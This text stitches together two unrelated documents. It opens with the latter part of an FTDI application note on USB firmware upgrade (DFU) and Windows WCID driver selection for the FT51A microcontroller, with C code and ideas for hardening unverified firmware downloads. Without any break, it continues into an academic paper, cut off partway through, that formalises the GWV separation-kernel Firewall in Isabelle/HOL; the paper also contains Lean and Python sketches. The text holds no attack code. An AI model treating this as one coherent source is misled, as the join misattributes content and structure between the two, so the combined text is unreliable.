state to appIDLE are controlled by the USB reset handler function. This is set by the “reset”
member of the USB_ctx structure when the USB library is initialised.
When the reset occurs the dfu_reset() function should be called. If the new firmware which has
been downloaded is to be run then the function will return a non-zero value. If no further action is
required then it will return zero.
```c
void reset_cb(uint8_t status)
{
    (void) status;
    USB_set_state(DEFAULT);
    if (dfu_reset())
    {
        device_revert();
    }
}
```
In this way, when the dfuMANIFEST-WAIT-RESET state is reached the application will wait until a USB bus reset from the host (or a disconnect event) before loading and running the new application from MTP Flash.
A reset occurring when in appDETACH state will move the DFU state to dfuIDLE. This would be noticed the next time the firmware calls dfu_is_runtime().
3.4 Timer
The DFU needs a millisecond timer to accurately return to the appIDLE state from the appDETACH state. The dfu_timer() function in the DFU library should be called every millisecond to enable this.
```c
void detach_interrupt(const uint8_t flags)
{
    (void)flags; // Flags not currently used
    // The DFU detach timer must be called once per millisecond
    dfu_timer();
    // Reload the timer
    TH0 = MSB(MICROSECONDS_TO_TIMER_TICKS(1000));
    TL0 = LSB(MICROSECONDS_TO_TIMER_TICKS(1000));
}

void detach_timer_initialise(void)
{
    // Register our own handler for interrupts from Timer 0
    interrupts_register(detach_interrupt, interrupts_timer0);
    // Timer0 is controlled by TMOD bits 0 to 3, and TCON bits 4 to 5.
    TMOD &= 0x0F; // Clear Timer0 bits
    TMOD |= 0x01; // Put Timer0 in mode 1 (16 bit)
    // Set the count-up value so that it rolls over to 0 after 1 millisecond.
    TH0 = MSB(MICROSECONDS_TO_TIMER_TICKS(1000));
    TL0 = LSB(MICROSECONDS_TO_TIMER_TICKS(1000));
    TCON &= 0xCF; // Clear Timer0's Overflow and Run flags
    TCON |= 0x10; // Start Timer0 (set its Run flag)
}
```
3.5 Device Detach-Attach
A function is provided that will detach and then reattach the device from the USB. This is only required if "bitWillDetach" is set in the DFU functional descriptor.
```c
void usb_detach_attach(void)
{
    // Short delay
    ms_timer = 10; while (ms_timer > 0);
    // Disable the USB device to force a reset
    USB_finalise();
    ms_timer = 10; while (ms_timer > 0);
    // Start the USB device.
    usb_setup();
}
```
4 WCID Selection
The Windows Compatible ID (WCID) method is used to select the WinUSB driver for the DFU interface.
4.1 WCID String Descriptor
The first step is to respond to a USB String Descriptor request for string number 0xEE with an application specific vendor request code to use for the rest of the WCID process.
This firmware defines the vendor request code to be 0xF1. This can be any value from 0x00 to 0xFF.
```c
#define WCID_VENDOR_REQUEST_CODE 0xF1
```
A macro is defined in ft51_usb.h to craft a Microsoft WCID string descriptor from the required vendor request code.
```c
__code uint8_t wcid_string_descriptor[USB_MICROSOFT_WCID_STRING_LENGTH] = {
USB_MICROSOFT_WCID_STRING(WCID_VENDOR_REQUEST_CODE)
};
```
When responding to a GET_DESCRIPTOR request for a string the special case is added for the Microsoft WCID string descriptor.
```c
case USB_DESCRIPTOR_TYPE_STRING:
// Special case: WCID descriptor
if (lValue == USB_MICROSOFT_WCID_STRING_DESCRIPTOR)
{
src = (uint8_t *)wcid_string_descriptor;
length = sizeof(wcid_string_descriptor);
break;
}
```
After this string descriptor check has been performed then the normal string descriptors can be processed and returned.
4.2 WCID Vendor Requests
Once Windows has determined that a device supports WCID then it will issue vendor requests to get further information. This information determines which driver is installed and what GUIDs can be assigned to an interface to identify it to applications.
This firmware will request the WinUSB driver and provide a GUID for a device interface.
Once the vendor request is confirmed as the correct vendor request code then the firmware will respond with a compatible ID or a device GUID.
```c
if (req->bRequest == WCID_VENDOR_REQUEST_CODE)
{
if (req->bmRequestType & USB_BREQUESTTYPE_DIR_DEV_TO_HOST)
{
switch (req->wIndex)
{
case USB_MICROSOFT_WCID_FEATURE_WINDEX_COMPAT_ID:
if (length > sizeof(wcid_feature_runtime)) // too many bytes requested
length = sizeof(wcid_feature_runtime); // Entire structure.
if (dfu_is_runtime())
        {
            USB_transfer(USB_EP_0, USB_DIR_IN,
                         (uint8_t *) &wcid_feature_runtime, length);
            status = FT51_OK;
        }
        else
        {
            USB_transfer(USB_EP_0, USB_DIR_IN,
                         (uint8_t *) &wcid_feature_dfumode, length);
            status = FT51_OK;
        }
        break;
    }
```
Run-time mode and DFU mode compatible IDs are required since the interface number of the DFU interface may differ between the two modes.
The GUID defined in this application for the FT51A is "{1eaaaa95-1bd6-49c2-b4ae-286583f61227}".
5 Possible Improvements
The lack of a manifestation stage could allow unwanted, unauthorised or unverified firmware to be programmed on the device.
If required then some additional checking can be done to protect the device.
5.1 Obfuscating DFU Commands
A simple method would be to change the DFU requests so that they did not match the specification. The host PC application would also change to match this.
Changes could be as simple as changing the values for bRequest in the SETUP token or adding additional steps into the DFU state machine.
A host PC application could conceivably issue disguised or undocumented commands to the FT51A to enable the DFU mode without the DFU interface appearing in the run-time mode configuration descriptor.
Note: A USB analyser can be used to reverse engineer these changes.
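As an illustrative sketch only, the remapping could be a simple translation table shared out of band with the host PC application. The obfuscated values below are arbitrary examples and not part of the FT51A library; only the standard request codes come from the DFU 1.1 specification:

```c
#include <stdint.h>

/* Standard DFU bRequest values from the DFU 1.1 specification. */
#define DFU_DETACH    0x00
#define DFU_DNLOAD    0x01
#define DFU_GETSTATUS 0x03
#define DFU_GETSTATE  0x05

/* Arbitrary replacement values agreed with the host application. */
#define OBF_DETACH    0x5A
#define OBF_DNLOAD    0xC3
#define OBF_GETSTATUS 0x96
#define OBF_GETSTATE  0x3C

/* Map an obfuscated bRequest back to the standard request code.
   Anything unrecognised maps to 0xFF, which the handler would treat
   as an unsupported request and stall the control endpoint. */
static uint8_t deobfuscate_request(uint8_t bRequest)
{
    switch (bRequest)
    {
    case OBF_DETACH:    return DFU_DETACH;
    case OBF_DNLOAD:    return DFU_DNLOAD;
    case OBF_GETSTATUS: return DFU_GETSTATUS;
    case OBF_GETSTATE:  return DFU_GETSTATE;
    default:            return 0xFF;
    }
}
```

The class request handler would then switch on the translated value instead of `req->bRequest` directly; standard DFU tools would no longer recognise the device, which is the intent of the obfuscation.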
5.2 Adding Manifestation Checks
A manifestation phase could be implemented by downloading the firmware twice. The first pass could check the validity and checksum of the download and the second pass program the firmware into the MTP Flash.
An alternative method, which would provide a non-secure manifestation check, would be to program the MTP Flash with code and at the same time validate it. If the validation does not succeed then the Shadow RAM could be committed back to the MTP Flash to overwrite the downloaded firmware. This would not provide a secure solution to validating firmware.
A simpler method would be to implement manifestation in blocks. This could be in the form of some encryption or validation checksum. The blocks would have to be smaller than the available __xdata area on the FT51A.
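As a sketch of such a per-block check, each downloaded block could carry a small integrity trailer that is verified before the block is written to MTP Flash. The trailer layout and the simple additive checksum below are assumptions made for illustration; they are not part of the FT51A DFU library:

```c
#include <stdint.h>
#include <stddef.h>

/* Validate a block whose final two bytes hold a big-endian 16-bit
   additive checksum of the preceding payload bytes.
   Returns 1 if the block may be programmed, 0 if it must be rejected. */
static int dfu_block_is_valid(const uint8_t *block, size_t length)
{
    uint16_t sum = 0;
    uint16_t expected;
    size_t i;

    if (length < 2)
        return 0; /* No room for the trailer. */

    for (i = 0; i < length - 2; i++)
        sum += block[i];

    expected = (uint16_t)((block[length - 2] << 8) | block[length - 1]);
    return sum == expected;
}
```

The DFU_DNLOAD handler could call a check of this kind before programming each block and report a failure to the host through the status returned by DFU_GETSTATUS on a mismatch.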
All these methods add to the size of the code required to implement DFU on the FT51A.
5.3 Recovery
As implemented, a failed download may have programmed some MTP Flash memory but not completed the whole program. In this case the firmware could "commit" the Shadow RAM contents back to MTP Flash rather than rely on the host PC application trying again. Otherwise, power cycling the device while the MTP Flash is in an inconsistent state could leave corrupt firmware on the device.
5.4 Security
Some firmware could be secured using the TOP_SECURITY_LEVEL register. This can prevent write access to certain parts of the MTP Flash. It could therefore be manipulated to prevent access to portions of code while allowing other parts to be modified.
6 Contact Information
Head Office – Glasgow, UK
Future Technology Devices International Limited
Unit 1, 2 Seaward Place, Centurion Business Park
Glasgow G41 1HH
United Kingdom
Tel: +44 (0) 141 429 2777
Fax: +44 (0) 141 429 2758
E-mail (Sales) sales1@ftdichip.com
E-mail (Support) support1@ftdichip.com
E-mail (General Enquiries) admin1@ftdichip.com
Branch Office – Tigard, Oregon, USA
Future Technology Devices International Limited (USA)
7130 SW Fir Loop
Tigard, OR 97223-8160
USA
Tel: +1 (503) 547 0988
Fax: +1 (503) 547 0987
E-mail (Sales) us.sales@ftdichip.com
E-mail (Support) us.support@ftdichip.com
E-mail (General Enquiries) us.admin@ftdichip.com
Branch Office – Taipei, Taiwan
Future Technology Devices International Limited (Taiwan)
2F, No. 516, Sec. 1, NeiHu Road
Taipei 114
Taiwan, R.O.C.
Tel: +886 (0) 2 8791 3570
Fax: +886 (0) 2 8791 3576
E-mail (Sales) tw.sales1@ftdichip.com
E-mail (Support) tw.support1@ftdichip.com
E-mail (General Enquiries) tw.admin1@ftdichip.com
Branch Office – Shanghai, China
Future Technology Devices International Limited (China)
Room 1103, No. 666 West Huaihai Road,
Shanghai, 200052
China
Tel: +86 21 62351596
Fax: +86 21 62351595
E-mail (Sales) cn.sales@ftdichip.com
E-mail (Support) cn.support@ftdichip.com
E-mail (General Enquiries) cn.admin@ftdichip.com
Web Site
http://ftdichip.com
Distributor and Sales Representatives
Please visit the Sales Network page of the FTDI Web site for the contact details of our distributor(s) and sales representative(s) in your country.
System and equipment manufacturers and designers are responsible to ensure that their systems, and any Future Technology Devices International Ltd (FTDI) devices incorporated in their systems, meet all applicable safety, regulatory and system-level performance requirements. All application-related information in this document (including application descriptions, suggested FTDI devices and other materials) is provided for reference only. While FTDI has taken care to assure it is accurate, this information is subject to customer confirmation, and FTDI disclaims all liability for system designs and for any applications assistance provided by FTDI. Use of FTDI devices in life support and/or safety applications is entirely at the user’s risk, and the user agrees to defend, indemnify and hold harmless FTDI from any and all damages, claims, suits or expense resulting from such use. This document is subject to change without notice. No freedom to use patents or other intellectual property rights is implied by the publication of this document. Neither the whole nor any part of the information contained in, or the product described in this document, may be adapted or reproduced in any material or electronic form without the prior written consent of the copyright holder. Future Technology Devices International Ltd, Unit 1, 2 Seaward Place, Centurion Business Park, Glasgow G41 1HH, United Kingdom. Scotland Registered Company Number: SC136640
Appendix A – References
Document References
FTDI MCU web page: http://www.ftdichip.com/MCU.html
SDCC web page: http://sdcc.sourceforge.net
Eclipse CDT web page: http://www.eclipse.org/cdt
GnuWin32 make web page: http://gnuwin32.sourceforge.net/packages/make.htm
GnuWin32 coreutils web page: http://gnuwin32.sourceforge.net/packages/coreutils.htm
Hex2Bin web page: http://hex2bin.sourceforge.net
MinGW web page: http://www.mingw.org
GDB online documentation web page: https://sourceware.org/gdb/onlinedocs/gdb
USB Test and Measurement Class specification: http://www.usb.org/developers/docs/devclass_docs/USBTMC_1_006a.zip
USB Device Firmware Update Class specification: http://www.usb.org/developers/docs/devclass_docs/DFU_1.1.pdf
Acronyms and Abbreviations
<table>
<thead>
<tr>
<th>Terms</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>DFU</td>
<td>Device Firmware Upgrade</td>
</tr>
<tr>
<td>MTP Flash</td>
<td>Multiple Time Program – non-volatile memory used to store program code on the FT51A.</td>
</tr>
<tr>
<td>SDCC</td>
<td>Small Device C Compiler</td>
</tr>
<tr>
<td>USB</td>
<td>Universal Serial Bus</td>
</tr>
<tr>
<td>USB-IF</td>
<td>USB Implementers Forum</td>
</tr>
</tbody>
</table>
Appendix B – List of Tables & Figures
List of Figures
Figure 2.1 DFU States
Figure 4.1 Installing Device Driver Message
Figure 4.2 Device Driver Software Not Installed Message
Figure 4.3 Device Manager Entry for FT51 Runtime
Figure 4.4 Windows Security Confirmation Box
Figure 4.5 Update Driver Software Confirmation Box
Appendix C – Revision History
<table>
<thead>
<tr>
<th>Revision</th>
<th>Changes</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.0</td>
<td>Initial Release</td>
<td>2015-12-21</td>
</tr>
</tbody>
</table>
Formal Methods for MILS: Formalisations of the GWV Firewall
Ruud Koolen
Eindhoven University of Technology
r.p.j.koolen@tue.nl
Julien Schmaltz
Eindhoven University of Technology
j.schmaltz@tue.nl
ABSTRACT
To achieve security certification according to the highest levels of assurance, formal models and proofs of security properties are required. In the MILS context, this includes formalisation of key components – such as separation kernels – and the formalisation of applications built on top of these verified components. In this paper, we use the Isabelle/HOL proof assistant to formalise the Firewall application built on top of a verified separation kernel according to the model of Greve, Wilding, and Vanfleet (GWV). This Firewall application has been formalised twice after the original effort by GWV. These different efforts have been compared and discussed on paper. Our main contribution is to provide a formal comparison between these formalisations in the formal logic of a proof assistant.
1. INTRODUCTION
To achieve security certification at the highest levels of assurance (e.g. EAL6 or EAL7 of the Common Criteria), formal models and proofs are required. In the context of MILS architectures, this not only means the formalisation of key components, like separation kernels, but also the formalisation of more mundane applications and their composition in a complete system.
Within the EURO-MILS project, we aim at providing a modelling and validation environment based on the formalisation of a generic MILS architecture. This environment should ease the development of formal models and proofs of systems built according to the MILS architectural paradigm. We present and discuss three existing efforts about the formal verification of an application built on top of a verified separation kernel. This application is a Firewall originally proposed by Greve, Wilding, and Vanfleet [5], who also proved its correctness using the ACL2 theorem prover [6]. This formalisation was later replicated by Rushby [9], who proved the relevant properties in the logic of the PVS [8] proof system; to do so, he also refined the axiomatisation of the Firewall behaviour. Subsequently, a further refinement of this formalisation was proposed by Van der Meyden [2], who also proves relations between the three efforts using informal pen-and-paper proofs. Our main contribution is to formalise Van der Meyden’s axiomatisation and proofs in the Isabelle/HOL proof assistant [7]. We also re-formulate in Isabelle/HOL the formalisations by GWV and Rushby and the relations between the three axiomatisations. As part of this effort we found a small flaw in Van der Meyden’s axiomatisation, for which we present a corrected version; we regard this as a confirmation of the value of the formalisation of mathematics in the logic of computer proof systems.
In the next three sections, we introduce the Firewall example application, the GWV model of formalised security, and express the Firewall in term of the GWV model. Afterwards, we compare the three different axiomatisations of the Firewall, proving relevant relations between them. We point out a flaw in the axiomatisation of Van der Meyden, and present a corrected version. Finally, we formally show how all three axiomatisations are sufficient to prove the desired properties of the larger system containing the Firewall, which we take as the compositional overall correctness proof.
2. THE FIREWALL APPLICATION
The application Greve, Wilding, and Vanfleet used as an example of their formalisation of security is one that sanitises useful but sensitive information for use by an untrusted application. This so-called Firewall takes as input information presented by trusted parts of the system, which may be sensitive. It then filters and censors this information to produce a version that can safely be passed to applications that are not trusted to handle it securely, and delivers this sanitised information to a location where the untrusted application can find it. Under the assumption that the Firewall application is the only source of information to the untrusted application, this should provably ensure that no sensitive information ever ends up within reach of the untrusted application.
The Firewall application does not exist in a vacuum. It runs on top of an operating system of some sort, specified in more detail in the next section, which provides controlled access to memory. Its job is to divide the system memory into segments and enforce limits on which applications can access which memory segments. To ensure security, it is assumed that the operating system is configured in such a way that the Firewall application is the only component that can write to memory segments that are accessible to the untrusted application; moreover, it can only write to a single such segment, denoted as outbox. This configuration is depicted in Figure 1.
For the purpose of the Firewall example, Greve, Wilding and Vanfleet do not try to express in detail what information is and is not sensitive. Instead, they assume the presence of a predicate black that, for a given memory segment and system state, expresses whether or not that segment contains only nonsensitive information. Thus, in a given state, a memory segment is black if and only if its contents are not sensitive. The function of the Firewall, then, is to make sure it only ever writes black data to outbox. The security requirement we seek to formalise can then be expressed as requiring that none of the memory segments accessible to the untrusted application ever becomes nonblack. The main goal of the different formalisations presented in the remainder of this paper is to prove that this is the case under the assumption that the operating system and Firewall work as specified.
3. THE GWV MODEL OF SEPARATION
The system model proposed by Greve, Wilding and Vanfleet [5] (GWV) guarantees a security property called Separation. Extensions and variations of this model have then been proposed [10, 4] and discussed [3, 1]. We will nonetheless use the original GWV model [5], which is sufficient for the purposes of this paper.
The GWV model defines a mathematical formulation of systems similar to the one presented in Figure 1. At its base, a GWV system is a deterministic state machine, with states denoted s or t. Execution consists of repeatedly changing from a state s to the next state denoted next(s). A GWV system contains a finite set of memory segments, which in each state s have contents denoted select(s, a) for segment a. Furthermore, it contains a finite set of partitions, which represent independent subcomponents akin to processes in general-purpose operating systems. In any state, a single partition is currently active and executing; this partition is denoted current(s) for state s. This basic model is formalised in Isabelle parlance using the following axioms:
\[ \text{fixes current :: State \Rightarrow Partition} \]
\[ \text{fixes select :: State \Rightarrow Segment::finite \Rightarrow Value} \]
\[ \text{fixes next :: State \Rightarrow State} \]
Here, State, Partition, Segment, and Value represent arbitrary sets. The finiteness condition on Partition is irrelevant for the correctness of any of the formalised proofs and has been omitted. Finiteness of Segment, on the other hand, turns out to be crucial.
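For readers more familiar with dependently typed provers, the same signature can be sketched in Lean 4. This is an illustrative rendering only, not the paper's Isabelle sources; the names mirror the text:

```lean
-- Illustrative Lean 4 rendering of the GWV system signature.
-- State, Partition, Segment and Value are arbitrary types; the paper
-- additionally requires Segment to be finite.
structure GWVSystem (State Partition Segment Value : Type) where
  current : State → Partition       -- the partition executing in a state
  select  : State → Segment → Value -- the contents of a segment in a state
  next    : State → State           -- the deterministic transition function
```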
The GWV model assumes that the different partitions run on top of a separation kernel, a basic operating system tasked with the duty of restricting memory access of partitions to those accesses that satisfy a given security policy. One part of this security policy is a set of memory segments \( \text{segs}(p) \) for each partition \( p \) describing the memory segments that that partition is allowed to access. A more subtle component of the security policy is an information flow policy, represented by a binary relation between memory segments, with the semantics that any computation step that writes to memory segment \( a \) may only do so while reading from a limited set of input memory segments. Thus, information may only flow along the edges of the directed graph represented by the information flow policy. GWV formalise the information flow policy as a function \( \text{dia} \), short for direct interaction allowed, which for each memory segment \( a \) returns a set \( \text{dia}(a) \) of memory segments that are allowed to directly influence it:
\[ \text{fixes segs :: Partition \Rightarrow P(Segment)} \]
\[ \text{fixes dia :: Segment \Rightarrow P(Segment)} \]
The security requirement enforced by the separation kernel can then be expressed as requiring that all memory accesses must respect the security policy. Greve, Wilding, and Vanfleet call this property separation. Rather than describing how a separation kernel might enforce such a security policy, GWV define separation as requiring that all actions performed by a partition must be independent of the contents of memory segments that are not allowed to influence the action. Specifically, they require that whenever a partition writes to a memory segment \( a \), the contents written may depend only on the the contents of the segments that are both in the accessible segments of the executing partition and \( \text{dia}(a) \):
\[ \text{assumes Separation: } \forall s, t \in \text{State}, a \in \text{Segment}. \]
\[ \text{current}(s) = \text{current}(t) \land \]
\[ \text{select}(s, a) = \text{select}(t, a) \land \]
\[ (\forall b \in \text{dia}(a) \cap \text{segs}(\text{current}(s)).\ \text{select}(s, b) = \text{select}(t, b)) \]
\[ \rightarrow \text{select}(\text{next}(s), a) = \text{select}(\text{next}(t), a) \]
This definition reads that for any segment \( a \), for any states for which both the contents of \( a \) and the active partition are equal, the contents of \( a \) in the next state must be a function of the contents of the memory segments that are both readable by the active partition and allowed to influence \( a \). Thus, in changing the contents of \( a \), the executing partition may not make use of any information other than that allowed by the security policy.
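The axiom can likewise be rendered as a predicate in Lean 4, for illustration, with \( \text{dia} \) and \( \text{segs} \) given as binary predicates rather than set-valued functions:

```lean
-- Illustrative Lean 4 rendering of the Separation axiom.
def Separation {State Partition Segment Value : Type}
    (current : State → Partition)
    (select : State → Segment → Value)
    (next : State → State)
    (dia : Segment → Segment → Prop)    -- dia a b: b may influence a
    (segs : Partition → Segment → Prop) -- segs p b: p may access b
    : Prop :=
  ∀ s t a,
    current s = current t →
    select s a = select t a →
    (∀ b, dia a b → segs (current s) b → select s b = select t b) →
    select (next s) a = select (next t) a
```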
In the GWV system model, the presence and correct functioning of a separation kernel is taken as an assumption, as formalised by the Separation axiom. Greve, Wilding, and Vanfleet propose that this axiom is a useful base for proving security properties of larger systems that rely on a separation kernel as a key component. They use their Firewall
application as an example of how to prove security properties of a larger system by relying on the separation kernel as a provider of the base security infrastructure.
4. FIREWALL IN GWV
In this section, we formally define both the Firewall application and the security property it is supposed to provably establish.
The Firewall application is a partition \( F \) that collects sensitive information from unspecified locations in the system, and passes a sanitised version of this information along to a different partition, \( B \), that cannot be trusted to handle it securely. Relying on the separation kernel to ensure that no other partitions can write to memory segments accessible to the untrusted application, this should ensure that the untrusted application can only ever get access to information that has been judged safe by the Firewall.
GWV satisfy this information flow property as the specific requirement that there is a single memory segment \( \text{outbox} \) accessible to \( B \) which may be influenced by segments accessible to partitions other than \( B \). Furthermore, any such segments that can influence \( \text{outbox} \) can only be accessible by \( F \) and \( B \). Formally:
\[
\begin{align*}
\text{assumes FW_Pol: } & \forall a, b \in \text{Segment},\ P \in \text{Partition}. \\
& a \in \text{segs}(B) \land \\
& b \in \text{dia}(a) \land \\
& b \in \text{segs}(P) \land \\
& P \neq B \rightarrow \\
& (P = F \land a = \text{outbox})
\end{align*}
\]
Together with the Separation axiom described in the previous section, this should suffice to ensure that the only information that ends up in segments accessible to \( B \) is information that the Firewall put there.
As described in Section 2, the behaviour of the Firewall is modelled using the \( \text{black} \) predicate, which models the distinction between sensitive and nonsensitive information. A memory segment is black in a given state if the contents of that segment in that state does not contain any sensitive information. The security functionality of the Firewall, then, is that it never writes any information to \( \text{outbox} \) that would cause it to become nonblack. This can be formalised as the proposition that \( \text{outbox} \) never changes from black to nonblack while the Firewall partition \( F \) is executing:
\[
\begin{align*}
\text{assumes FW_Blackens: } & \forall s \in \text{State}. \\
& \text{current}(s) = F \land \text{black}(s, \text{outbox}) \rightarrow \\
& \text{black}(\text{next}(s), \text{outbox})
\end{align*}
\]
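In the same illustrative Lean 4 style, FW_Blackens reads:

```lean
-- Illustrative Lean 4 rendering of FW_Blackens: while the Firewall
-- partition F is executing, a black outbox stays black.
def FW_Blackens {State Partition Segment : Type}
    (current : State → Partition) (next : State → State)
    (black : State → Segment → Prop)
    (F : Partition) (outbox : Segment) : Prop :=
  ∀ s, current s = F → black s outbox → black (next s) outbox
```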
We can now state a formal definition of the correctness of the Firewall application. The desired security property of the complete system including the Firewall, the untrusted application, and any possible other applications is that the segments accessible to \( B \) never become nonblack. The requirement that the segments of \( B \) start black is not a property of the Firewall; the weaker property that can be guaranteed by the Firewall is that if the segments of \( B \) are already black, they will remain black. Introducing a function \( \text{run} \) to express the execution of a number of computation steps, this can be formalised as follows:
\[
\begin{align*}
\text{fun run :: } N & \Rightarrow \text{State} \Rightarrow \text{State} \text{ where} \\
& \text{run}(0, s) = s \\
& \text{run}(\text{Suc}(n), s) = \text{run}(n, \text{next}(s))
\end{align*}
\]
\[
\text{theorem FW_Correct: } \forall s \in \text{State}, n \in N, a \in \text{segs}(B). \\
\text{black}(s, a) \rightarrow \text{black}(\text{run}(n, s), a)
\]
The combination of the Separation, FW_Blackens, and FW_Pol axioms is insufficient to prove the FW_Correct property. To close the gap, we need further properties describing the behaviour of the \( \text{black} \) predicate; for example, if black data in the segments accessible to \( B \) could become nonblack of its own accord, the FW_Correct security property would quickly fall apart. It is in the axiomatisation of the \( \text{black} \) predicate that GWV, Rushby, and Van der Meyden differ in their approaches. These three approaches will be the topic of the next section.
5. AXIOMATISING BLACKNESS
The behaviour of the Firewall is defined in terms of the \( \text{black} \) predicate, which models the property of a segment of memory of not containing any sensitive information. It would be expected for this property to satisfy certain axioms, such as the proposition that a segment cannot change from black to nonblack without the segment contents being modified. Certainly, if a nonsensitive chunk of memory were suddenly to become sensitive without anyone touching that piece of memory, this would violate our assumptions on what sensitivity is supposed to mean.
In their publications, GWV, Rushby, and Van der Meyden take different approaches in characterising the assumed behaviour of the \( \text{black} \) predicate. The basic notion of all three approaches is that nonblack data cannot be generated from black data; any computational process that takes only nonsensitive data as its input must surely produce output that is also nonsensitive. In this section, we compare the three different axiomatisations of this notion, and prove relevant relations between them.
5.1 The GWV Formalisation
One of the main properties that GWV require the \( \text{black} \) predicate to have is that in a system in which all segments are black, all segments will remain black; this is a special case of the “no spontaneous generation of nonblack data” principle described above. Another property they require is that blackness is a function of the content of a memory segment; it is not allowed that the same data is considered black or nonblack depending on the context, as this would allow sensitive data to leak into a completely idle partition.
\[
\begin{align*}
\text{assumes S5: } & (\forall a \in \text{Segment}. \ \text{black}(s, a)) \rightarrow \\
& (\forall a \in \text{Segment}. \ \text{black}(\text{next}(s), a))
\end{align*}
\]
\[
\begin{align*}
\text{assumes S6: } & \text{select}(s, a) = \text{select}(t, a) \rightarrow \\
& \text{black}(s, a) = \text{black}(t, a)
\end{align*}
\]
These two properties are not sufficient to prove all desired properties of blackness, however. In particular, we would like to be able to prove a version of S5 restricted to a particular partition: the proposition that when all segments of a partition \( P \) are black in a state in which \( P \) is active, then
all these segments will still be black in the next state. A
lemma like this has an obvious role to play in any potential
proof of FW_Correct.
To make this possible, GWV assume that for every state
s and any segment a, a state can be constructed in which a is
black but which is otherwise identical to s; such a state could
be constructed by, say, wiping the contents of the memory
segment a. To formalise this notion, they posit the existence
of a function scrub producing such a state scrub(a, s), with
straightforward properties:
\textbf{fixes scrub :: Segment ⇒ State ⇒ State}
\textbf{assumes S1:}
\textbf{scrub(a, scrub(b, s)) = scrub(b, scrub(a, s))}
\textbf{assumes S2:}
\(a \neq b \rightarrow \text{select}(\text{scrub}(b, s), a) = \text{select}(s, a)\)
\textbf{assumes S3:}
\textbf{black(\text{scrub}(b, s), a) \iff (a = b \lor \text{black}(s, a))}
\textbf{assumes S4:}
\textbf{current(\text{scrub}(a, s)) = current(s)}
Axioms S1, S2, and S4 together specify that scrub does
not change anything relevant about a state other than the
contents of the scrubbed segment; axiom S3 specifies that a
scrubbed segment is black.
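To see that these axioms are satisfiable, here is a small model of our own (not from GWV): a state is a pair of the active partition and a contents map, blackness is a function of a segment's contents alone (as S6 demands), and scrubbing overwrites a segment with a designated blank value:

```python
# Illustrative model (ours): blackness depends only on a segment's contents,
# and scrub replaces the contents of one segment with a blank, black value.
BLANK = 0

def select(s, a):
    return s[1][a]

def current(s):
    return s[0]

def black(s, a):
    # Example black-test: a segment is black when it holds the blank value.
    return select(s, a) == BLANK

def scrub(a, s):
    cur, contents = s
    return (cur, {**contents, a: BLANK})
```

In this model S1 holds because overwriting two different segments commutes, S2 and S4 hold because scrub touches nothing but the named segment, and S3 holds because the blank value is black.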
With these properties, the lemma sketched above can be
proven. For if all segments accessible to partition \(P\) are
black in a state \(s\) with \(\text{current}(s) = P\), we can construct a
state \(t\) in which all segments are black by scrubbing all other
segments; per axiom S5, the next state \(\text{next}(t)\) of \(t\) also has
all \(P\)-accessible segments black. But \(s\) and \(t\) have the same
contents of all memory segments accessible to \(P\); according
to the Separation axiom, the same must hold for \(\text{next}(s)\)
and \(\text{next}(t)\). Thus, per S6, because all \(P\)-accessible segments in
\(\text{next}(t)\) are black, the same must hold for \(\text{next}(s)\).
The axioms S1 ... S6 together with the FW_Blackens,
FW_Pol, and Separation properties are sufficient to prove the
desired FW_Correct theorem. We shall prove this by
showing that the GWV axioms are stronger than the Rushby
axioms, and that the Rushby axioms are sufficient to prove
FW_Correct; both claims are described in the sections below.
\textbf{5.2 Rushby's Version}
The formalisation proposed by Rushby is a reasonably
minor refinement of the original by GWV. Like GWV, Rushby
includes the two main properties from the GWV formalisation:
\textbf{assumes B4:}
\textbf{select(s, a) = select(t, a) \rightarrow
black(s, a) = black(t, a)}
\textbf{assumes B5:}
\((\forall a \in \text{Segment}. \text{black}(s, a)) \rightarrow
(\forall a \in \text{Segment}. \text{black}(\text{next}(s), a))\)
The difference between the two formalisations is that instead
of a function scrub that replaces the contents of a single
segment by a blackened version, Rushby posits a function
blacken that for a given state scrubs all segments that are
not black.
\textbf{fixes blacken :: State ⇒ State}
\textbf{assumes B1:}
\textbf{black(blacken(s), a)}
\textbf{assumes B2:}
\textbf{black(s, a) \rightarrow select(s, a) = select(blacken(s), a)}
\textbf{assumes B3:}
\textbf{current(s) = current(blacken(s))}
It is clear that this axiomatisation is quite similar to GWV’s
original. The lemma that was proven for the GWV formalisation can be proven for Rushby's version in a very similar way. Furthermore, it is clear that the Rushby axioms follow from the GWV axioms: the blacken function can be constructed by calling scrub on each segment that is not black\(^1\), and the resulting function clearly satisfies the B1, B2, and B3 axioms.
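The construction just described can be sketched directly (our own Python illustration, with `segments`, `scrub`, and `black` supplied by the model): blacken folds scrub over every segment that is not already black, which is well defined precisely because the segment list is finite.

```python
# Sketch (ours): derive blacken from scrub by scrubbing each nonblack segment.
def make_blacken(segments, scrub, black):
    def blacken(s):
        for a in segments:
            if not black(s, a):
                s = scrub(a, s)
        return s
    return blacken
```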
Unfortunately, formalising this fact in Isabelle proved challenging. In the logic of Isabelle, the fact that Segment is finite is expressed as a nonconstructive assertion that a function \(f :: \mathbb{N} \Rightarrow \text{Segment}\) and a natural number \(n\) exist such that the segments \(f(m)\) for \(0 \leq m < n\) exactly cover Segment. Because this is a nonconstructive assertion, we can only similarly prove in a nonconstructive way that a function blacken must exist that behaves like a repeated application of scrub. Both proving that this function exists, and working with this function to prove properties such as B1 ... B3 about it, are technically challenging; moreover, they result in cumbersome proofs that are difficult to understand due to the technical tricks intermixing with the substance of the argument. We consider this a weakness of the Isabelle proof system; a more readable way of dealing with nonconstructively existing entities would be a welcome improvement. To avoid turning this section into an unreadable mess of proof trickery, we have omitted the formal proof that the GWV axioms imply the Rushby axioms.
Similarly to the previous section, we prove that the axioms B1 ... B5 combined with the FW_Blackens, FW_Pol, and Separation properties are sufficient to prove the desired FW_Correct theorem by reducing this problem to the related problem for Van der Meyden's axiom. Doing so will be the subject of the remainder of this paper.
\textbf{5.3 Van der Meyden's Axiom}
Van der Meyden argues that the axioms defined by GWV and Rushby unnecessarily restrict the class of systems to which the results apply. He proposes an alternative formalisation consisting of a single axiom over the predicate black, without the need for ancillary functions and thus without the richness of the state space they imply. Rushby's axiom B5 basically states that if the entire system is black, then this is still the case in the next state. Van der Meyden generalises this notion by requiring that if the value of a memory segment is computed based only on the values of a set of memory segments \(X\), and all segments in \(X\) are black, then the computed segment must be black in the next state.
\(^1\)Here the fact that the number of segments is finite is critical; without this requirement, the function blacken could not be defined based on scrub.
